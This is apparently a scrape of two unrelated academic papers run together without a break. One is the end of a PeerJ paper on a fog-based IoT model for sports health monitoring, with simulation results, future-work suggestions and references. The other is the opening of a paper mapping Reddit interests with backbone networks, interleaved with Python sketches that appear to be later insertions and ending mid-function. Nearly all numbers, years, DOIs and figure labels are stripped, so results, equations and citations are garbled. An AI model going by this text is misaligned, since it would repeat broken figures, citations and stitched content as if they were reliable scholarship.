since data flow cannot be done with the sensors in the simulation, the requests (mips and time values) are given to the system randomly through a list. these requests, which are assumed to be sorted according to their priorities, are assigned to the fog nodes sequentially according to the proposed algorithm. after each assignment, the list of fog nodes is sorted according to their unused capacity. in a loop, if the request can only be satisfied by one fog node, it is placed at that fog node and the loop breaks. in this case, the module placement process is carried out according to the code in fig. . if the request cannot be assigned to a single fog node, the list of fog nodes is scanned backwards and the capacities of the nodes are summed. if the appropriate capacity is reached, it is distributed across these fog nodes. in this case, the module placement process is carried out according to the code in fig. . if the request cannot be assigned to any fog node (single or distributed), the request is rejected because there is not enough capacity in the fog layer. this process is shown in the code in fig. . figure data exchange between modules in simulation. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure module placement executed if the request can only be assigned to a fog node. full-size doi: . /peerj-cs. /fig- figure module placement executed if the request could not be assigned to a single fog node. full-size doi: . /peerj-cs. /fig- figure process executed when the request is not assigned to the fog layer. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results of the simulation application the simulation results according to the randomly generated ( , , , , , , , , , , , ) (mips) list of requests are shown in fig. . at the same time, a randomly generated deadline is determined for each request. in fig. , numofgateways = , numofenddevpergateway = are selected. in the graphics in fig. , the simulation is run by increasing the “numofenddevpergateway” value. in the “tuple cpu execution delay” heading in fig. , the types and delay times of the tuples transmitted between modules are shown. source and target modules and types of requests are given in table . figure simulation results of the proposed algorithm. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the area in the node or nodes where the request is placed during the deadline period is reserved for that request. in the simulation, assuming that the placed requests have not yet produced results, the other requests in the queue continue to be placed in fog nodes. in order to show the result of each phase, the number of fog nodes was chosen as . for results that occur with more fog nodes, it can be re-run by changing the values of “numofgateways” and “numofenddevpergateway” in the main block of the simulation application. in fig. , the “results” part, produced as a standard by the ifogsim program, shows the time spent for the operation of the system, the energy spent and the general cost. 
table the flow and types of tuples between modules. source destination tuple type direction iotsensor clientmodule iotsensor up clientmodule mainmodule rawdata up mainmodule storagemodule storedata up mainmodule clientmodule resultdata down clientmodule iotactuator response down figure graphs of the simulation results of the proposed algorithm. graphs of the simulation results of the proposed algorithm ((a) execution time, (b) total network usage, (c) application loops delay time, (d) cost of execution in cloud). full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the graph of execution time (a), total network usage (b), application loop delays time (c), cost of execution in cloud (d) values from the simulation results obtained by changing the number of fog nodes is shown in fig. . as the number of nodes increases, execution time and application loop delay increase. when the number of nodes is , high latency occurs in the rawdata tuple. therefore, execution time and application loop delay are much higher. while the total network usage increases with the number of nodes, it decreases when there are nodes. the high delay of the rawdata tuple does not affect network activities. in addition, the total network usage may vary depending on the request costs. cloud usage cost is highest when the number of nodes is . this situation varies according to the cost values of the requests. address for simulation codes: github.com/akarakaya/simapp. comparison of the proposed model the proposed study is compared with buyya & srirama ( ), which shares the simulation codes openly. both studies are compared using numofgateways = and numofenddevpergateway = parameters. in addition, the fog nodes with the features in table are used. the comparison results are shown in table . according to the comparison results, data transmission delay times between modules and network usage are lower in the proposed model. the cloud node costs are higher than the fog node costs. additional protocols and remote server are used in communication with the cloud nodes. this indicates that fog computing causes lower latency than cloud computing. therefore, fog computing is used in the proposed algorithm. in table , the values of the proposed model are taken from the result in fig. . if every request in the simulation is supplied by the fog layer in the proposed algorithm (if the situation in fig. does not occur), the values of the proposed model in table are much lower. however, this also depends on the size of the requests and the capacity of the fog nodes. challenges in wearable technologies and future works this section includes challenges in wearable technologies and some future study suggestions. when wearable device technology is combined with fog computing, this table comparison of the proposed algorithm with the related work. features buyya & srirama ( ) the proposed algorithm execution time total network usage . . application loop delays time . . cost of execution in cloud , . , , . tuple cpu executıon delay (rawdata) . . tuple cpu executıon delay (resultdata) . . tuple cpu executıon delay (iotsensor) . . tuple cpu executıon delay (storedata) . . karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/akarakaya/simapp http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ integrated structure can be a solution for applications requiring low latency (fiandrino et al., ). however, today there are a lot of challenges with wearable technologies. therefore, the issue of wearable technologies was not included in this article. challenges in wearable technologies; � devices may not be suitable for every user’s body. for this reason, the most appropriate and ergonomic product is tried to be developed according to age groups (hänsel et al., ). � with the interdisciplinary study between psychologists and engineers for new healthcare device designs, the product is addressed in terms of both technological and behavioral change. since wearable health devices self-diagnosis without medical knowledge may mislead the user, this situation should be handled in the developed wearable products. the future of wearable applications should support not only the development of new analysis algorithms for health data, but also the feedback of users for behavior change (hänsel et al., ). � the size, flexibility and operating requirements of existing chemical sensors used for health perception are difficult to use in applications as they are not compatible with wearable technology (bandodkar, jeerapan & wang, ). existing wearable devices do not meet the requirements due to their low power supplies, low energy density and slow charging. there are also major challenges in processing and securing the large data produced by wearable sensors. new generation cryptographic algorithms need to be developed to ensure data security and user privacy (bandodkar, jeerapan & wang, ). some future study suggestions: � wearable technologies have not yet reached the desired levels in terms of size, capacity, energy consumption, watertightness, high data processing, and security. for this reason, wearable technologies that are suitable for players and spectators, provide accurate data and are not affected by external factors such as sweat can be developed for sports applications. � lightweight and strong encryption and authentication methods can be developed for iot and fog computing applications. � consensus algorithms that are efficient on resource-constrained devices can be developed for blockchain-based iot applications. � lightweight and safe iot models can be developed for different areas similar to the health and tactical analysis monitoring model in the sports we proposed. � although the elliptic curve encryption system uses smaller keys, it provides similar security with rsa. it is based on the discrete logarithm problem. the ecc-based authentication models have been designed to prevent many attacks (islam & biswas, ). similar to ecqv implicit certificate method, post-quantum cryptographic protocols can be developed. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � communication of iot nodes, gateways, fog nodes, cloud nodes should be secure. all iot systems are affected by post-quantum security due to the needs of iot systems such as privacy, authentication, integrity (fernández-caramés, ). therefore, quantum-resistant schemes based on post-quantum cryptographic algorithm can be developed for iot and cloud systems. � authentication protocol based on post-quantum cryptography has been developed. 
this protocol, called lb- paka, was analyzed in a random oracle model to measure provable security and to estimate the breaching time (islam, ) protocols based on post-quantum cryptography can be developed for iot applications. � in akleylek et al. ( ), post-quantum identification scheme was proposed in iot applications. various polar forms of multivariate quadratic and cubic polynomial systems was used in this scheme. in akleylek & seyhan ( ), an authenticated key exchange approach based on the bi-gisis problem was proposed for post-quantum secure. similarly, identification and authenticated key exchange methods based on post-quantum cryptography can be developed for iot applications. conclusion in this study, a light and safe fog-based iot model is proposed in which the result obtained by analyzing the health and tactical data in sports is reported to the technical team and club doctors. in the proposed model, it is ensured that the responses to the end nodes are transmitted with low latency, and the data is processed and stored without the internet. urgent processes are given high priority with the priority queue method in the fog nodes. in this article, a resource management algorithm using priority queue method is recommended in the fog nodes. the algorithm is simulated using the ifogsim simulation tool. simulation results and comparisons with a similar study show that resource allocation and data processing in the fog nodes are performed with low latency. in similar studies in sports, iot applications are generally designed using only cloud computing. only health monitoring systems are covered. however, in the proposed model, fog computing is used for data processing and storage. thus, a higher performance architecture is created in terms of both security and low latency. in the proposed model, not only health monitoring status, but also tactical analyzes in the field are discussed. thus, the technical team and the club doctors are warned in a short time against possible negative results. for authentication, flat protocol, a lightweight authentication protocol, is used in resource-restricted devices. thanks to the implicit certificates in the flat protocol, significant savings in bandwidth can be achieved. in addition to authentication, this protocol provides data privacy. it also helps with data integrity in the fog layer. with the blockchain-based sdn controller structure, some attacks are detected and data integrity is provided. in the event of a flooding attack, data packets are stored in the cache and processed later to prevent flooding and overloading of the fog node. a lightweight and safe model is proposed for monitoring health and tactical analysis in sports. the proposed algorithm has been simulated and comparison results are given. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the future; studies on artificial intelligence methods that use the proposed model and perform health and tactical analysis in fog nodes are planned. additional information and declarations funding the authors received no funding for this work. competing interests sedat akleylek is an academic editor for peerj. author contributions � aykut karakaya conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. 
� sedat akleylek conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the simulation application codes are available at github: https://github.com/akarakaya/simapp. references abdulkareem kh, mohammed ma, gunasekaran ss, al-mhiqani mn, mutlag aa, mostafa sa, ali ns, ibrahim da. . a review of fog computing and machine learning: concepts, applications, challenges, and open issues. ieee access : – doi . /access. . . akleylek s, seyhan k. . a probably secure bi-gisis based modified ake scheme with reusable keys. ieee access : – doi . /access. . . akleylek s, soysald m, boubiche de, toral-cruz h. . a novel method for polar form of any degree of multivariate polynomials with applications in iot. sensors ( ): doi . /s . alameddine ha, sharafeddine s, sebbah s, ayoubi s, assi c. . dynamic task offloading and scheduling for low-latency iot services in multi-access edge computing. ieee journal on selected areas in communications ( ): – doi . /jsac. . . alrawais a, alhothaily a, hu c, cheng x. . fog computing for the internet of things: security and privacy issues. ieee internet computing ( ): – doi . /mic. . . baca a, kornfeind p. . rapid feedback systems for elite sports training. ieee pervasive computing ( ): – doi . /mprv. . . bandodkar aj, jeerapan i, wang j. . wearable chemical sensors: present challenges and future prospects. acs sensors ( ): – doi . /acssensors. b . basu s, karuppiah m, selvakumar k, li k-c, islam sh, hassan mm, bhuiyan mza. . an intelligent/cognitive model of task scheduling for iot applications in cloud computing karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/akarakaya/simapp http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /mic. . http://dx.doi.org/ . /mprv. . http://dx.doi.org/ . /acssensors. b http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ environment. future generation computer systems ( ): – doi . /j.future. . . . bonomi f, milito r, zhu j, addepalli s. . fog computing and its role in the internet of things. in: proceedings of the first edition of the mcc workshop on mobile cloud computing. – . bormann c, ersue m, keranen a. . terminology for constrained-node networks. in: internet engineering task force (ietf), fremont, ca, usa. burn-murdoch j. . how data analysis helps football clubs make better signings. available at https://www.ft.com/content/ aa b e-c a - e - cd- e db b . buyya r, srirama sn. . modelling and simulation of fog and edge computing environments using ifogsim toolkit. in: fog and edge computing: principles and paradigms. hoboken: wiley, – doi . / .ch . choudhari t, moh m, moh t-s. . prioritized task scheduling in fog computing. in: proceedings of the acmse, conference. – . cisco. . fog computing and the internet of things: extend the cloud to where the things are. available at https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview. pdf. fang w, zhou w, li y, yao x, xue f, xiong n. . a distributed admm approach for energy-efficient resource allocation in mobile edge computing. turkish journal of electrical engineering & computer sciences ( ): – . fernández-caramés tm. . 
from pre-quantum to post-quantum iot security: a survey on quantum-resistant cryptosystems for the internet of things. ieee internet of things journal ( ): – doi . /jiot. . . fiandrino c, allio n, kliazovich d, giaccone p, bouvry p. . profiling performance of application partitioning for wearable devices in mobile cloud and fog computing. ieee access : – doi . /access. . . habibi p, farhoudi m, kazemian s, khorsandi s, leon-garcia a. . fog computing: a comprehensive architectural survey. ieee access : – doi . /access. . . hänsel k, wilde n, haddadi h, alomainy a. . challenges with current wearable technology in monitoring health data and providing positive behavioural support. in: proceedings of the th eai international conference on wireless mobile communication and healthcare, – . heydari g, rahbari d, nickray m. . energy saving scheduling in a fog-based iot application by bayesian task classification approach. turkish journal of electrical engineering & computer sciences ( ): – doi . /elk- - . horton m, gudmundsson j, chawla s, estephan j. . automated classification of passing in football. in: cao t, lim e-p, zhou z-h, ho t-b, cheung d, motoda h, eds. advances in knowledge discovery and data mining. cham: springer international publishing, – . ikram ma, alshehri md, hussain fk. . architecture of an iot-based system for football supervision (iot football). in: ieee nd world forum on internet of things (wf-iot), piscataway: ieee, – . iqbal s, malik aw, rahman au, noor rm. . blockchain-based reputation management for task offloading in micro-level vehicular fog network. ieee access : – doi . /access. . . islam sh. . provably secure two-party authenticated key agreement protocol for post-quantum environments. journal of information security and applications ( ): doi . /j.jisa. . . karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.future. . . https://www.ft.com/content/ aa b e-c a - e - cd- e db b http://dx.doi.org/ . / .ch https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview.pdf https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview.pdf http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /elk- - http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.jisa. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ islam sh, biswas g. . design of improved password authentication and update scheme based on elliptic curve cryptography. mathematical and computer modelling ( – ): – doi . /j.mcm. . . . krishnan p, duttagupta s, achuthan k. . sdn/nfv security framework for fog-to-things computing infrastructure. software: practice and experience ( ): – doi . /spe. . kuang z, li l, gao j, zhao l, liu a. . partial offloading scheduling and power allocation for mobile edge computing systems. ieee internet of things journal ( ): – doi . /jiot. . . kubler s, robert j, hefnawy a, främling k, cherifi c, bouras a. . open iot ecosystem for sporting event management. ieee access : – doi . /access. . . li h, jia z, xue x. . application and analysis of zigbee security services specification. second international conference on networks security, wireless communications and trusted computing : – . liu w, nishio t, shinkuma r, takahashi t. . adaptive resource discovery in mobile cloud computing. computer communications ( ): – doi . /j.comcom. . . . luan th, gao l, li z, xiang y, wei g, sun l. . fog computing: focusing on mobile users at the edge. 
available at https://arxiv.org/abs/ . . madsen h, burtschy b, albeanu g, popentiu-vladicescu f. . reliability in the utility computing era: towards reliable fog computing. in: th international conference on systems, signals and image processing (iwssip), piscataway: ieee, – . mouradian c, kianpisheh s, abu-lebdeh m, ebrahimnezhad f, jahromi nt, glitho rh. . application component placement in nfv-based hybrid cloud/fog systems with mobile fog nodes. ieee journal on selected areas in communications ( ): – doi . /jsac. . . mukherjee m, matam r, shu l, maglaras l, ferrag ma, choudhury n, kumar v. . security and privacy in fog computing: challenges. ieee access : – doi . /access. . . naha rk, garg s, georgakopoulos d, jayaraman pp, gao l, xiang y, ranjan r. . fog computing: survey of trends, architectures, requirements, and research directions. ieee access : – doi . /access. . . niu x, shao s, xin c, zhou j, guo s, chen x, qi f. . workload allocation mechanism for minimum service delay in edge computing-based power internet of things. ieee access : – doi . /access. . . nofer m, gomber p, hinz o, schiereck d. . blockchain. business & information systems engineering ( ): – doi . /s - - - . okay fy, ozdemir s. . routing in fog-enabled iot platforms: a survey and an sdn-based solution. ieee internet of things journal ( ): – doi . /jiot. . . paul a, pinjari h, hong w-h, seo hc, rho s. . fog computing-based iot for health monitoring system. journal of sensors ( ): – doi . / / . pfisterer d, lipphardt m, buschmann c, hellbrueck h, fischer s, sauselin jh. . marathonnet: adding value to large scale sport events-a connectivity analysis. in: proceedings of the first international conference on integrated internet ad hoc and sensor networks, . rahbari d, nickray m. . low-latency and energy-efficient scheduling in fog-based iot applications. turkish journal of electrical engineering & computer sciences ( ): – doi . /elk- - . karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.mcm. . . http://dx.doi.org/ . /spe. http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.comcom. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . / / http://dx.doi.org/ . /elk- - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ roman r, lopez j, mambo m. . mobile edge computing, fog et al.: a survey and analysis of security threats and challenges. future generation computer systems ( ): – doi . /j.future. . . . santos ml, carneiro jc, franco am, teixeira fa, henriques ma, oliveira lb. . flat: federated lightweight authentication for the internet of things. ad hoc networks ( ): doi . /j.adhoc. . . sharma pk, chen m-y, park jh. . a software defined fog node based distributed blockchain cloud architecture for iot. ieee access : – doi . /access. . . shelby z, hartke k, bormann c. . the constrained application protocol (coap). available at https://tools.ietf.org/html/rfc . soni p, pal ak, islam sh. . an improved three-factor authentication scheme for patient monitoring using wsn in remote health-care system. computer methods and programs in biomedicine ( ): doi . /j.cmpb. . . taki t, hasegawa j-i. . visualization of dominant region in team games and its application to teamwork analysis. in: proceedings computer graphics international , piscataway: ieee, – . 
vales-alonso j, lópez-matencio p, gonzalez-castaño fj, navarro-helln h, baños-guirao pj, pérez-martnez fj, martnez-Álvarez rp, gonzález-jiménez d, gil-castiñeira f, duro-fernández r. . ambient intelligence systems for personalized sport training. sensors ( ): – doi . /s . wang x, chen m, taleb t, ksentini a, leung vc. . cache in the air: exploiting content caching and delivery techniques for g systems. ieee communications magazine ( ): – doi . /mcom. . . wazid m, das ak, shetty s, jo m. . a tutorial and future research for building a blockchain-based secure communication scheme for internet of intelligent things. ieee access : – doi . /access. . . yang h-k, cha h-j, song y-j. . secure identifier management based on blockchain technology in ndn environment. ieee access : – doi . /access. . . yi s, li c, li q. . a survey of fog computing: concepts, applications and issues. in: proceedings of the workshop on mobile big data, – . yoon g, choi d, lee j, choi h. . management of iot sensor data using a fog computing node. journal of sensors ( ): – doi . / / . zhu t, shi t, li j, cai z, zhou x. . task scheduling in deadline-aware mobile edge computing systems. ieee internet of things journal ( ): – doi . /jiot. . .
navigating the massive world of reddit: using backbone networks to map user interests in social media randal s. olson ,∗, zachary p. neal department of computer science & engineering department of sociology michigan state university, east lansing, mi , u.s.a. ∗ e-mail: olsonran@msu.edu abstract in the massive online worlds of social media, users frequently rely on organizing themselves around specific topics of interest to find and engage with like-minded people. however, navigating these massive worlds and finding topics of specific interest often proves difficult because the worlds are mostly organized haphazardly, leaving users to find relevant interests by word of mouth or using a basic search feature. here, we report on a method using the backbone of a network to create a map of the primary topics of interest in any social network. to demonstrate the method, we build an interest map for the social news web site reddit and show how such a map could be used to navigate a social media world. moreover, we analyze the network properties of the reddit social network and find that it has a scale-free, small-world, and modular community structure, much like other online social networks such as facebook and twitter. we suggest that the integration of interest maps into popular social media platforms will assist users in organizing themselves into more specific interest groups, which will help alleviate the overcrowding effect often observed in large online communities. introduction in the past decade, social media platforms have grown from a pastime for teenagers into tools that pervade nearly all modern adults’ lives [ ].
social media users typically organize themselves around specific interests, such as a sports team or hobby, which facilitates interactions with other users who share similar interests. for example, facebook users subscribe to topic-specific “pages” [ ], twitter users classify their tweets using topic-specific “hashtags” [ ], and reddit users post and subscribe to topic-specific sub-forums called “subreddits” [ ]. these interest-based devices provide structure to the growing worlds of social media, and are essential for the long-term success of social media platforms because they make these big worlds feel small and navigable. however, navigation of social media is challenging because these worlds do not come with maps [ , ]. users are often left to discover pages, hashtags, or subreddits of interest haphazardly, by word of mouth, following other users’ “votes” or “likes”, or by using a basic search feature. owing to the scale-free structure of most online social networks, these elementary navigation strategies result in users being funnelled into a few large and broad interest groups, while failing to discover more specific groups that may be of greater interest [ , ]. in this work, we combine techniques for network backbone extraction and community detection to construct a roadmap that can assist social media users in navigating these interest groups by identifying related interest groups and suggesting them to users. we implement this method for the social news web site reddit [ ], one of the most visited social media platforms on the web [ ], and produce an interactive map of all of the subreddits. an interactive version of the reddit interest map is available online [ ]. by viewing subreddits as nodes linked by users with common interests, we find that the reddit social media world has a scale-free, small-world, and modular community structure. the scale-free property is the expected outcome of a preferential attachment process and helps explain the challenges of haphazard navigation. additionally, the small-world property explains how the big world of reddit can seem small and navigable to users when it is mapped out. finally, the modular community structure in which narrow interest-based subreddits (e.g., dubstep or rock music) are organized into broader communities (e.g., music) allows users to easily identify related interests by zooming in on a broader community. we suggest that the integration of such interest maps into popular social media platforms will assist users in organizing themselves into more specific interest groups, which will help alleviate the overcrowding effect often observed in large online communities [ ]. further, this work releases and provides an overview of a data set of over , anonymized reddit user’s interests, thus establishing another standard real-world social network data set for researchers to study. this is useful because, although reddit is among the largest online social networks and has been identified as a starting point for the viral spread of memes and other online information [ ], it has been relatively understudied [ , , ]. this data set can be downloaded online at [ ]. video games my little pony lgbt pornography programming guns electronic music fitness sports soccer figure . reddit interest network. the largest components of the reddit interest network is shown with interest meta-communities annotated; it closely matches the structure of other online social networks including flikr and yahoo [ ]. 
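As an aside on reproducing Figure 1, node sizes follow a weighted PageRank and the layout is produced with OpenOrd in Gephi. The sketch below, which assumes a networkx backbone graph G whose edges carry a 'weight' attribute, computes the PageRank scores and writes a GEXF file that Gephi can load; the layout itself is then run inside Gephi.

```python
import networkx as nx

def size_and_export(G, path="reddit_backbone.gexf"):
    """Attach weighted PageRank scores (used for node sizing) and export for Gephi."""
    scores = nx.pagerank(G, alpha=0.85, weight="weight")
    nx.set_node_attributes(G, scores, "pagerank")
    nx.write_gexf(G, path)   # Gephi can map the 'pagerank' attribute to node size
    return scores
```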
each node is a single subreddit, where color indicates the interest meta-community that the subreddit is a member of. nodes are sized by their weighted pagerank to provide an indication of how likely a node is to be visited, and positioned according to the openord layout in gephi to place related nodes together. an interactive version of the reddit interest map is available online at http://rhiever.github.io/redditviz/clustered/ http://rhiever.github.io/redditviz/clustered/ results reddit interest map for the final version of the reddit interest map, we use the backbone network produced with α = . (see methods). this results in a network with distinct clusters, which we call interest meta-communities. in figure , the nodes (i.e., subreddits) are sized by their weighted pagerank [ ] to provide an indication of how likely a node is to be visited, and positioned according to the openord layout in gephi [ ] to place related nodes together. through this method, we immediately see several distinct interest meta-communities, of which are annotated in figure . these interest meta-communities act as starting points in the interest map to show the broad interest categories that the entire reddit community is discussing. from these starting points, users can zoom in on a single broad interest category to find subreddits dedicated to more specific interests, as shown in figure . notably, there is a large, orange interest meta-community in the center of the interest map that overlaps with several other interest meta-communities. this orange interest meta-community represents the most popular, general interest subreddits (e.g., “pictures” and “videos”) in which users of all backgrounds regularly participate, and thus are expected to have considerable overlap with many other communities. figure depicts zoomed-in views of two interest meta-communities annotated in figure . in fig- ure a, the “sports” meta-community, specific sports teams are organized around the corresponding sport that the teams play in. for example, subreddits dedicated to discussion of the washington redskins or denver broncos – relatively small, specific subreddits – are organized around the larger, more general interest nfl subreddit where users discuss the latest nfl news and games. similarly in figure b, the “programming” meta-community, subreddits dedicated to discussing programming languages such as python and java are organized around a more general programming subreddit, where users discuss more general programming topics. this backbone network structure naturally lends itself to an intuitive interest recommendation system. instead of requiring a user to provide prior information about their interests, the interest map provides a hierarchical view of all user interests in the social network. further, instead of only suggesting interests immediately related to the user’s current interest(s), the interest map recommends interests that are potentially two or more links away. for example in figure a, although the miami heat and miami dolphins subreddits are not linked, miami heat fans may also be fans of the miami dolphins. a traditional recommendation system would only recommend nba to a miami heat fan, whereas the interest map also recommends the miami dolphins subreddit because they are members of the same interest meta- community. network properties in figure , we show a series of network statistics to provide an overview of the backbone reddit interest network. 
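Before turning to the network statistics, the meta-community recommendation idea described above (suggesting subreddits from the same interest meta-community even when they are not directly linked) can be illustrated with a short sketch. This is an illustration only: it uses networkx's greedy modularity communities as a stand-in for the Louvain clustering behind the published map, and weighted PageRank to rank the suggestions.

```python
import networkx as nx
from networkx.algorithms import community

def build_recommender(G):
    """Assign each subreddit to a meta-community and a popularity score."""
    comms = community.greedy_modularity_communities(G, weight="weight")
    community_of = {node: i for i, c in enumerate(comms) for node in c}
    popularity = nx.pagerank(G, weight="weight")
    return community_of, popularity

def recommend(subreddit, G, community_of, popularity, top_n=5):
    """Suggest subreddits from the same meta-community, excluding the
    direct neighbours a user would already discover by browsing."""
    cid = community_of[subreddit]
    known = set(G.neighbors(subreddit)) | {subreddit}
    candidates = [n for n in G.nodes if community_of[n] == cid and n not in known]
    return sorted(candidates, key=popularity.get, reverse=True)[:top_n]
```

With such a scheme, a query for a team-specific subreddit returns other members of the same sports meta-community, mirroring the Miami Heat to Miami Dolphins example above.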
these network statistics are plotted over a range of α cutoff values for the backbone reddit interest network (see methods) to demonstrate that the interest network we chose in figure is robust to relevant α cutoff values. as expected, the majority of the edges are pruned by an α cutoff of . (figure , top left). this result demonstrates that the backbone interest network is stable with an α cutoff ≤ . , which is the most relevant range of α cutoffs to explore. surprisingly, % of the subreddits that we investigated – roughly , subreddits – do not have enough users that consistently post in another subreddit to maintain even a single edge with another subreddit. the majority of these , subreddits likely do not have any significant edges due to user inactivity, e.g., some subreddits have only a single user that frequently posts to them (table ). another factor that likely contributes to the , unlinked subreddits is temporary interests, i.e., an interest such as the u.s. presidential election that temporarily a) b) figure . example reddit interest meta-communities. pictured are several topic-specific subreddits composing a meta-community around a broad topic such as sports (a) or programming (b). each node is a subreddit, and each edge indicates that a significant portion of the posters in the two subreddits post in both subreddits (see methods). - - - - . . . . . . f ra c ti o n o f to ta l number of nodes number of edges - - - - . . . . e x p o n e n t fo r p o w e r la w f it - - - - . . . . . . a v g c lu st e ri n g c o e ff ic ie n t reddit network random network - - - - . . . . . . a v g s h o rt e st p a th l e n g th - - - - α # o f c o m m u n it ie s - - - - α . . . . . . m o d u la ri ty figure . network statistics for the backbone network. sensitivity analysis of the reddit interest network over a range of α cutoff values. lower α means that fewer statistically significant edges are pruned. in general, this sensitivity analysis shows that the backbone interest network is stable for α cutoff values ≤ . . error bars for the erdős-rényi random networks are two standard deviations over random networks, and are too small to show up on the graph. note the logarithmic scale of the x-axis. draws a large number of people together, but eventually fades into obscurity again. next, we are interested in exploring whether the backbone reddit interest network is a scale-free network, where preferential attachment to subreddits results in a few extremely popular (i.e., connected) subreddits and mostly unpopular subreddits. as such, scale-free networks are known to have node degree distributions that fit a power law [ , ]. regardless of the α cutoff, we observed that the node degree distribution of all backbone reddit interest networks fit a power law (r ≈ . for k ≥ ; figure , top right). this scale-free network structure is likely partially due to reddit’s default subreddit system [ ], where newly registered users are subscribed to a set of subreddits by default. furthermore, we want to confirm that the backbone reddit interest network is a small-world net- work [ ]. 
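Before moving on to the small-world analysis, the power-law check just described can be approximated with an ordinary least-squares fit on log-log axes. The paper does not spell out its fitting procedure, so the sketch below (numpy assumed, G being the networkx backbone graph) is only a rough stand-in for that analysis; a dedicated package such as powerlaw would give a more principled fit.

```python
import numpy as np

def degree_powerlaw_fit(G, k_min=1):
    """Fit P(k) ~ k**(-gamma) to the degree distribution of G on log-log axes."""
    degrees = np.array([d for _, d in G.degree()])
    ks, counts = np.unique(degrees[degrees >= k_min], return_counts=True)
    pk = counts / counts.sum()

    slope, intercept = np.polyfit(np.log10(ks), np.log10(pk), 1)

    # R^2 of the log-log regression as a crude goodness-of-fit measure
    predicted = slope * np.log10(ks) + intercept
    residual = np.sum((np.log10(pk) - predicted) ** 2)
    total = np.sum((np.log10(pk) - np.log10(pk).mean()) ** 2)
    return -slope, 1.0 - residual / total   # exponent gamma and R^2
```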
small-world networks are known to contain numerous clusters, as indicated by a high average clustering coefficient, with sparse edges between those clusters, which results in an average shortest path length between all nodes (lsw) that scales logarithmically with the number of nodes (n): lsw ≈ log (n) ( ) figure (middle left and middle right) depicts the average clustering coefficient and shortest path length for all nodes in the backbone reddit interest network. compared to erdős-rényi random networks with the same number of nodes and edges, the backbone network has a significantly higher average clustering coefficient. similarly, the measured average shortest path length of the backbone network (α cutoff = . ) follows equation , with lsw = log ( , ) = . ≈ . from figure (middle right). thus, the backbone reddit interest backbone network qualitatively appears to exhibit small-world network properties. to quantitatively determine whether the reddit interest network exhibits small-world network prop- erties, we used the small-worldness score (sg) proposed in [ ]: sg = cg/crand lg/lrand ( ) where c is the average clustering coefficient, l is the average shortest path length between all nodes, g is the network the small-worldness score is being computed for, and “rand” is an erdős-rényi random network with the same number of nodes and edges as g. if sg > , then the network is classified as a small-world network. for the backbone reddit network, we calculated sg = . (p < . ), which indicates that the reddit interest network exhibits small-world network properties. now that we know that the backbone reddit interest network is scale-free and exhibits small-world network properties, we want to study the community structure of the backbone network. shown in figure (bottom right), the backbone network exhibits a consistently high modularity score with an α cutoff as high as . , implying that even a slight reduction in the number of edges in the backbone network reveals the reddit interest community structure. correspondingly, depicted in figure (bottom left), the number of identified communities (i.e., clusters) remains relatively low until the α cutoff is reduced to ≤ . . as the α cutoff is reduced, the number of identified communities generally decreases, which coincides with the loss of nodes as α decreases. thus, the backbone reddit interest network has ≈ core communities, and another ≈ weakly linked communities that are lost as a more stringent α cutoff is applied. discussion we have shown that backbone networks can be used to map and navigate massive interest networks in social media. by viewing the big world of reddit as a hierarchical map, users can now explore related interests without providing any prior information about their own interests. future applications of this method may also facilitate navigation of other popular social network platforms such as facebook and twitter. furthermore, such an interest map could allow social media users to self-organize into more specific interest forums, thus reducing preferential attachment to large, general interest forums and alleviating the issues that arise in overcrowded social network forums [ ]. 
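As a concrete note on the small-world measures reported above, Eqs. (1) and (2) can be evaluated directly from the backbone graph. The sketch below compares the average clustering coefficient and average shortest path length against Erdős-Rényi random graphs with the same numbers of nodes and edges and returns the small-worldness score; the number of random replicates and the assumption that the backbone is connected are choices made for the example.

```python
import math
import networkx as nx

def small_worldness(G, n_random=10, seed=0):
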